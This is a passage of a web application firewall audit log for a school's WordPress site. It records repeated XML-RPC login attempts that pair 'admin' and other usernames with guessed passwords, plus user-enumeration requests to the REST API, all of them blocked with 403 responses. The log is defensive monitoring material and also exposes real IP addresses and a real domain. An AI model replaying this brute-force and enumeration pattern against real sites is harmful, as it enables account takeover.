p2=2739, p3=0, p4=0, p5=107, sr=82, sw=81, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12cbcd13-Z-- --b36b391d-A-- [14/Jun/2025:08:03:21 +0700] aEzKWWmwZ6YUkjOdtI7A7gAAAAQ 103.236.140.4 56838 103.236.140.4 8181 --b36b391d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --b36b391d-C-- wp.getUsersBlogs admin aaa111 --b36b391d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --b36b391d-E-- --b36b391d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (50+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863001719590 4195 (- - -) Stopwatch2: 1749863001719590 4195; combined=3235, p1=353, p2=2706, p3=0, p4=0, p5=101, sr=80, sw=75, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --b36b391d-Z-- --d364dc15-A-- [14/Jun/2025:08:04:23 +0700] aEzKl2IDXuKmWNi2UBSy4wAAAEU 103.236.140.4 56944 103.236.140.4 8181 --d364dc15-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d364dc15-C-- wp.getUsersBlogs admin campus --d364dc15-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d364dc15-E-- --d364dc15-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (48+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863063951093 6042 (- - -) Stopwatch2: 1749863063951093 6042; combined=4133, p1=559, p2=3399, p3=0, p4=0, p5=104, sr=102, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d364dc15-Z-- --71484c6b-A-- [14/Jun/2025:08:05:44 +0700] aEzK6GIDXuKmWNi2UBSzEwAAAEs 103.236.140.4 57060 103.236.140.4 8181 --71484c6b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --71484c6b-C-- wp.getUsersBlogs admin qweasdzx --71484c6b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --71484c6b-E-- --71484c6b-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (40+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863144059667 5152 (- - -) Stopwatch2: 1749863144059667 5152; combined=3679, p1=445, p2=3062, p3=0, p4=0, p5=100, sr=83, sw=72, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --71484c6b-Z-- --527f957a-A-- [14/Jun/2025:08:06:49 +0700] aEzLKWmwZ6YUkjOdtI7BAQAAAAY 103.236.140.4 57146 103.236.140.4 8181 --527f957a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 218 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --527f957a-C-- wp.getUsersBlogs admin unknown --527f957a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --527f957a-E-- --527f957a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (34+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863209960535 5313 (- - -) Stopwatch2: 1749863209960535 5313; combined=3738, p1=451, p2=3106, p3=0, p4=0, p5=105, sr=82, sw=76, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --527f957a-Z-- --ea55a77e-A-- [14/Jun/2025:08:06:54 +0700] aEzLLkMWfhkd5Y0sFtrn2wAAAIc 103.236.140.4 57170 103.236.140.4 8181 --ea55a77e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 37.130.37.171 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 37.130.37.171 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --ea55a77e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --ea55a77e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749863214609329 2499 (- - -) Stopwatch2: 1749863214609329 2499; combined=1136, p1=376, p2=732, p3=0, p4=0, p5=28, sr=72, sw=0, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --ea55a77e-Z-- --710fee0b-A-- [14/Jun/2025:08:07:48 +0700] aEzLZEMWfhkd5Y0sFtrn-AAAAI0 103.236.140.4 57234 103.236.140.4 8181 --710fee0b-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --710fee0b-C-- wp.getUsersBlogs admin 1234%^&* --710fee0b-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --710fee0b-E-- --710fee0b-H-- Message: XML parser error: XML: Failed parsing document. Message: Warning. Match of "eq 0" against "REQBODY_ERROR" required. [file "/usr/local/apache/modsecurity-cwaf/rules/12_HTTP_Protocol.conf"] [line "27"] [id "210230"] [rev "2"] [msg "COMODO WAF: The request body could not be parsed. Possibility of an impedance mismatch attack. This is not a false positive.||smkn22-jkt.sch.id|F|2"] [data "XML parser error: XML: Failed parsing document."] [severity "CRITICAL"] [tag "CWAF"] [tag "Protocol"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863268130298 5383 (- - -) Stopwatch2: 1749863268130298 5383; combined=3742, p1=453, p2=3119, p3=0, p4=0, p5=101, sr=91, sw=69, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --710fee0b-Z-- --d3b1b263-A-- [14/Jun/2025:08:07:49 +0700] aEzLZUMWfhkd5Y0sFtrn-wAAAJA 103.236.140.4 57240 103.236.140.4 8181 --d3b1b263-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --d3b1b263-C-- wp.getUsersBlogs admin computer --d3b1b263-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d3b1b263-E-- --d3b1b263-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (42+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863269179674 4404 (- - -) Stopwatch2: 1749863269179674 4404; combined=3296, p1=341, p2=2763, p3=0, p4=0, p5=109, sr=77, sw=83, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d3b1b263-Z-- --e68e6a4d-A-- [14/Jun/2025:08:08:49 +0700] aEzLoUMWfhkd5Y0sFtroIwAAAIo 103.236.140.4 57356 103.236.140.4 8181 --e68e6a4d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --e68e6a4d-C-- wp.getUsersBlogs admin bailey --e68e6a4d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --e68e6a4d-E-- --e68e6a4d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (53+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863329933804 4303 (- - -) Stopwatch2: 1749863329933804 4303; combined=3309, p1=348, p2=2765, p3=0, p4=0, p5=111, sr=79, sw=85, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --e68e6a4d-Z-- --6fb2726c-A-- [14/Jun/2025:08:09:49 +0700] aEzL3V3g_boun6Rx5jLOVQAAAMw 103.236.140.4 57484 103.236.140.4 8181 --6fb2726c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 217 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6fb2726c-C-- wp.getUsersBlogs admin taylor --6fb2726c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6fb2726c-E-- --6fb2726c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (55+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863389035187 4304 (- - -) Stopwatch2: 1749863389035187 4304; combined=3230, p1=396, p2=2664, p3=0, p4=0, p5=99, sr=82, sw=71, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6fb2726c-Z-- --6ea8875d-A-- [14/Jun/2025:08:10:49 +0700] aEzMGV3g_boun6Rx5jLOcQAAANE 103.236.140.4 57600 103.236.140.4 8181 --6ea8875d-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --6ea8875d-C-- wp.getUsersBlogs admin charlie1 --6ea8875d-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --6ea8875d-E-- --6ea8875d-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (50+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863449471162 2873 (- - -) Stopwatch2: 1749863449471162 2873; combined=2062, p1=240, p2=1701, p3=0, p4=0, p5=69, sr=50, sw=52, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --6ea8875d-Z-- --12d69843-A-- [14/Jun/2025:08:11:54 +0700] aEzMWmIDXuKmWNi2UBSzfAAAAEM 103.236.140.4 57802 103.236.140.4 8181 --12d69843-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 219 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --12d69843-C-- wp.getUsersBlogs admin pa55word --12d69843-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --12d69843-E-- --12d69843-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (98+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863514337933 5569 (- - -) Stopwatch2: 1749863514337933 5569; combined=3887, p1=483, p2=3196, p3=0, p4=0, p5=118, sr=117, sw=90, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --12d69843-Z-- --d181cf3e-A-- [14/Jun/2025:08:12:36 +0700] aEzMhEMWfhkd5Y0sFtroQwAAAJQ 103.236.140.4 57936 103.236.140.4 8181 --d181cf3e-B-- GET /wp-json/wp/v2/users/ HTTP/1.0 Referer: https://smkn22-jkt.sch.id/wp-json/wp/v2/users/ Host: smkn22-jkt.sch.id X-Real-IP: 102.217.204.196 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 102.217.204.196 X-Forwarded-Proto: https Connection: close User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/86.0.4240.198 Safari/537.36 --d181cf3e-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --d181cf3e-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at REQUEST_COOKIES_NAMES. [file "/usr/local/apache/modsecurity-cwaf/rules/26_Apps_WordPress.conf"] [line "155"] [id "225170"] [rev "3"] [msg "COMODO WAF: Sensitive Information Disclosure Vulnerability in WordPress 4.7 (CVE-2017-5487)||smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "WordPress"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Stopwatch: 1749863556787802 1958 (- - -) Stopwatch2: 1749863556787802 1958; combined=1000, p1=315, p2=657, p3=0, p4=0, p5=27, sr=72, sw=1, l=0, gc=0 Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --d181cf3e-Z-- --c9113550-A-- [14/Jun/2025:08:12:57 +0700] aEzMmWmwZ6YUkjOdtI7BHgAAAAk 103.236.140.4 57966 103.236.140.4 8181 --c9113550-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --c9113550-C-- wp.getUsersBlogs admin tottenham1 --c9113550-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --c9113550-E-- --c9113550-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (78+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863577651843 5369 (- - -) Stopwatch2: 1749863577651843 5369; combined=3756, p1=483, p2=3060, p3=0, p4=0, p5=121, sr=90, sw=92, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --c9113550-Z-- --7311635a-A-- [14/Jun/2025:08:13:57 +0700] aEzM1WIDXuKmWNi2UBSzwwAAAEI 103.236.140.4 58088 103.236.140.4 8181 --7311635a-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 221 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --7311635a-C-- wp.getUsersBlogs wakakur password --7311635a-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --7311635a-E-- --7311635a-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (57+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863637306656 31230 (- - -) Stopwatch2: 1749863637306656 31230; combined=55381, p1=435, p2=3025, p3=0, p4=0, p5=25974, sr=88, sw=81, l=0, gc=25866 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --7311635a-Z-- --151ad360-A-- [14/Jun/2025:08:14:57 +0700] aEzNEWmwZ6YUkjOdtI7BWgAAABc 103.236.140.4 58284 103.236.140.4 8181 --151ad360-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 223 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --151ad360-C-- wp.getUsersBlogs wakakur wakakurpwd --151ad360-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --151ad360-E-- --151ad360-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (91+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag "OtherApps"] Apache-Error: [file "apache2_util.c"] [line 271] [level 3] [client %s] ModSecurity: %s%s [uri "%s"]%s Action: Intercepted (phase 2) Apache-Handler: proxy:unix:/opt/alt/php-fpm74/usr/var/sockets/smkn22.sock|fcgi://localhost Stopwatch: 1749863697002471 2969 (- - -) Stopwatch2: 1749863697002471 2969; combined=2252, p1=254, p2=1882, p3=0, p4=0, p5=67, sr=56, sw=49, l=0, gc=0 Response-Body-Transformed: Dechunked Producer: ModSecurity for Apache/2.9.1 (http://www.modsecurity.org/); CWAF_Apache. 
Server: Apache/2.4.57 (Unix) OpenSSL/1.0.2k-fips Engine-Mode: "ENABLED" --151ad360-Z-- --59c9c94c-A-- [14/Jun/2025:08:16:03 +0700] aEzNU0MWfhkd5Y0sFtrobgAAAJI 103.236.140.4 58386 103.236.140.4 8181 --59c9c94c-B-- POST /xmlrpc.php HTTP/1.0 Host: smkn22-jkt.sch.id X-Real-IP: 118.195.130.163 X-Forwarded-Host: smkn22-jkt.sch.id X-Forwarded-Server: smkn22-jkt.sch.id X-Forwarded-For: 118.195.130.163 X-Forwarded-Proto: http Connection: close Content-Length: 224 Content-Type: application/xml; charset=ISO-8859-1 User-Agent: Apache-HttpClient/4.5.2 (Java/1.8.0_161) --59c9c94c-C-- wp.getUsersBlogs wakakur wakakur2003 --59c9c94c-F-- HTTP/1.1 403 Forbidden Content-Length: 199 Connection: close Content-Type: text/html; charset=iso-8859-1 --59c9c94c-E-- --59c9c94c-H-- Message: Access denied with code 403 (phase 2). Operator EQ matched 0 at IP. [file "/usr/local/apache/modsecurity-cwaf/rules/30_Apps_OtherApps.conf"] [line "5956"] [id "240335"] [rev "5"] [msg "COMODO WAF: XML-RPC Attack Identified (CVE-2013-0235)|Source 118.195.130.163 (39+1 hits since last alert)|smkn22-jkt.sch.id|F|2"] [severity "CRITICAL"] [tag "CWAF"] [tag 